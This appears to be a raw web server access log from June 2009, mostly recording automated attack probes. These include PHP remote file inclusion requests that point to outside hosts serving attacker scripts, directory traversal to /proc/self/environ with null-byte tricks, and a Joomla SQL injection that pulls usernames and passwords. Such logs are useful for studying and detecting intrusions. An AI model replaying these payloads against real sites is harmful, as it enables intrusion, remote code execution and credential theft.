117.110.57.130 - - [06/Jun/2009:00:40:55 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:00:40:55 -0400] "GET /logs/access_log.Q109050700////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:00:40:56 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 4373 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:41:29 -0400] "GET /logs/index2.php?ID=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:41:29 -0400] "GET /index2.php?ID=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.165.73.157 - - [06/Jun/2009:00:41:29 -0400] "GET /logs/access_log.Q109053100%20%20/index2.php?ID=http://cafe0.fileave.com/id.feelcomz.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.6.8.112 - - [06/Jun/2009:00:42:56 -0400] "GET /logs/access_log.Q107053100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
117.110.57.130 - - [06/Jun/2009:00:43:38 -0400] "GET /logs/access_log.Q109050700%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
117.110.57.130 - - [06/Jun/2009:00:44:06 -0400] "GET /logs/access_log.Q109051700%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:00:44:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.153.212.195 - - [06/Jun/2009:00:45:03 -0400] "GET /logs/access_log.Q109052100/bemarket/postscript/postscript.php?p_mode=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:00:45:04 -0400] "GET /bemarket/postscript/postscript.php?p_mode=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
122.153.212.195 - - [06/Jun/2009:00:45:04 -0400] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.skakmat.eu/system//administrator/components/idd.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.65"
218.1.64.133 - - [06/Jun/2009:00:47:19 -0400] "GET /logs/access_log.Q109052300//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 255 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [06/Jun/2009:00:47:19 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 233 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [06/Jun/2009:00:47:19 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [06/Jun/2009:00:47:19 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 235 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:00:47:19 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:00:47:20 -0400] "GET /logs/access_log.Q109052300//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 255 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:47:20 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:47:20 -0400] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:47:22 -0400] "GET /logs/access_log.Q109052300//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 255 "-" "XXXXXX"
218.1.64.133 - - [06/Jun/2009:00:47:29 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:00:47:30 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 233 "-" "XXXXXX"
217.73.161.62 - - [06/Jun/2009:00:47:35 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:00:47:35 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:00:47:35 -0400] "GET /logs/access_log.Q109050900%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:00:47:40 -0400] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 233 "-" "XXXXXX"
217.73.161.62 - - [06/Jun/2009:00:47:41 -0400] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:00:47:41 -0400] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.73.161.62 - - [06/Jun/2009:00:47:41 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.2 - - [06/Jun/2009:00:48:52 -0400] "GET //include/write.php?dir=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 216 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.221.130.2 - - [06/Jun/2009:00:48:52 -0400] "GET /logs//include/write.php?dir=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 221 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
77.221.130.2 - - [06/Jun/2009:00:48:53 -0400] "GET /errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.61 [en] (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:00:48:53 -0400] "GET /logs/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.61 [en] (OS/2; U)"
77.221.130.2 - - [06/Jun/2009:00:48:53 -0400] "GET //include/write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 216 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:00:48:53 -0400] "GET /logs//include/write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 221 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:00:48:53 -0400] "GET //include/write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 216 "-" "XXXXXX"
77.221.130.2 - - [06/Jun/2009:00:48:53 -0400] "GET /logs//include/write.php?dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 221 "-" "XXXXXX"
209.59.12.99 - - [06/Jun/2009:00:49:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.73.161.62 - - [06/Jun/2009:00:49:54 -0400] "GET /logs/access_log.Q109050900//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.203.95.235 - - [06/Jun/2009:00:50:39 -0400] "GET //mods/business_functions.php?GALLERY_BASEDIR=http://www.westsite.org.ru/404.txt? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
217.73.161.62 - - [06/Jun/2009:00:51:52 -0400] "GET /logs/access_log.Q109050900%20%20//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://amboy-x.ucoz.ae/scanner/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.24.218.140 - - [06/Jun/2009:00:51:53 -0400] "GET /logs/access_log.Q109050300//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.westsite.org.ru/404.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.826"
78.24.218.140 - - [06/Jun/2009:00:51:53 -0400] "GET /logs//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.westsite.org.ru/404.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.826"
78.24.218.140 - - [06/Jun/2009:00:54:17 -0400] "GET /logs/access_log.Q108121900//administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=http://www.westsite.org.ru/404.txt? HTTP/1.1" 404 287 "-" "libwww-perl/5.826"
209.59.12.99 - - [06/Jun/2009:00:54:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.1.64.133 - - [06/Jun/2009:00:55:03 -0400] "GET /logs/error_log.Q109052300//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
218.1.64.133 - - [06/Jun/2009:00:55:03 -0400] "GET /logs/error_log.Q109052300/errors.php?error=http://www.youdonthavetodiewhenyourdoctorsays.com/buggsbunny?? HTTP/1.1" 404 234 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
218.1.64.133 - - [06/Jun/2009:00:55:06 -0400] "GET /logs/error_log.Q109052300//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
113.29.225.7 - - [06/Jun/2009:00:55:07 -0400] "GET /logs/errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
113.29.225.7 - - [06/Jun/2009:00:55:07 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
113.29.225.7 - - [06/Jun/2009:00:55:07 -0400] "GET /errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.1.64.133 - - [06/Jun/2009:00:55:07 -0400] "GET /logs/error_log.Q109052300//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
113.29.225.7 - - [06/Jun/2009:00:56:46 -0400] "GET /errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
113.29.225.7 - - [06/Jun/2009:00:56:46 -0400] "GET /logs/errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
113.29.225.7 - - [06/Jun/2009:00:56:47 -0400] "GET /logs/access_log.Q109052300/errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
113.29.225.7 - - [06/Jun/2009:00:57:49 -0400] "GET /logs/access_log.Q109052300%20%20/errors.php?error=http://mattflynnphoto.com/edit-point/data/fx29id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:00:59:37 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [06/Jun/2009:01:01:28 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
117.110.57.130 - - [06/Jun/2009:01:02:29 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
123.143.98.5 - - [06/Jun/2009:01:03:56 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
89.104.71.173 - - [06/Jun/2009:01:04:10 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:10 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:10 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:11 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:11 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:11 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:12 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:12 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:12 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:32 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:32 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:32 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:32 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:01:04:32 -0400] "GET /errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:01:04:32 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:01:04:32 -0400] "GET /logs/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:32 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:32 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:33 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:33 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:04:33 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Jun/2009:01:04:38 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.67.146 - - [06/Jun/2009:01:04:48 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:04:48 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:04:48 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
78.111.80.18 - - [06/Jun/2009:01:05:11 -0400] "GET /logs/access_log.Q109052300%20%20/errors.php?error=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.71.14 - - [06/Jun/2009:01:05:13 -0400] "GET /logs/error_log.Q107082100 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
89.104.71.173 - - [06/Jun/2009:01:05:13 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
123.50.58.97 - - [06/Jun/2009:01:05:16 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Trend Micro WTP Add-On 1.2.1046"
89.104.71.173 - - [06/Jun/2009:01:05:17 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:05:19 -0400] "GET /logs/access_log.Q109051000%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:01:05:27 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:05:30 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:05:30 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:05:30 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:01:06:34 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 200 4373 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:21 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:21 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:21 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:21 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:21 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:22 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.149.85.37 - - [06/Jun/2009:01:07:27 -0400] "GET /logs/access_log.Q109051600%20//index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users-- HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
89.104.71.173 - - [06/Jun/2009:01:07:29 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:29 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:29 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:55 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:07:58 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:01 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.246.20.221 - - [06/Jun/2009:01:08:02 -0400] "GET /logs/access_log.Q109051700%20%20////?_SERVER[DOCUMENT_ROOT]=http://hit168.com.cn/images/upload/id.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:08 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:08 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:09 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:08:11 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:08:11 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
87.106.67.146 - - [06/Jun/2009:01:08:11 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:18 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:18 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:18 -0400] "GET /logs/access_log.Q109050900//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
89.104.71.173 - - [06/Jun/2009:01:08:30 -0400] "GET /logs/access_log.Q109050900%20%20//modules/vwar/admin/admin.php?vwar_root=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
